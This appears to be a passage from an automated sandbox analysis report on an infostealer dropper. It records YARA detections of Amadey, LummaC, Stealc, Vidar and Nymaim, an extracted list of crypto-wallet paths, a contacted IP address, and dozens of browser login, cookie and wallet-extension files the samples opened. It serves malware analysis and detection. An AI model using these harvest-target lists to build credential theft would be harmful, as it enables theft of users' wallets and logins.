                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9735A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C9735A0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008865E0 LookupAccountNameA,22_2_008865E0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_008C2517 GetTimeZoneInformation,22_2_008C2517
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CAA8390 NSS_GetVersion,0_2_6CAA8390
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: fc1511c233.exe, 0000001B.00000003.3393452315.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 34.2.skotes.exe.880000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 22.2.skotes.exe.880000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.EBFBFBFIIJ.exe.ed0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000016.00000002.3419500975.0000000000881000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.2785476787.0000000000ED1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.3351261822.0000000000881000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Yara detected Credential Flusher
                          Source: Yara matchFile source: Process Memory Space: 1b3b76c439.exe PID: 7712, type: MEMORYSTR
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: fc1511c233.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Nymaim
                          Source: Yara matchFile source: 26.2.e6d73861f4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.e6d73861f4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.e6d73861f4.exe.4b30e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.3.e6d73861f4.exe.4cf0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001A.00000002.3436535456.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000003.3209738665.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.3419472143.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Yara detected Stealc
                          Source: Yara matchFile source: 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6ae2430bb1.exe PID: 5396, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 6ae2430bb1.exe PID: 6464, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \ElectronCash\wallets\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Jaxx Desktop (old)
                          Source: file.exe, 00000000.00000002.2729388458.0000000001550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: exodus.conf.json
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: info.seco
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \jaxx\Local Storage\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B70000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: passphrase.json
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus\exodus.wallet
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16gineer\AppData\Roaming\Binance\.finger-print.fp
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: file__0.localstorage
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: MultiDoge
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B74000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: seed.seco
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                          Source: file.exe, 00000000.00000002.2727922118.0000000000B55000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Source: file.exe, 00000000.00000002.2729388458.00000000015B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*-
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
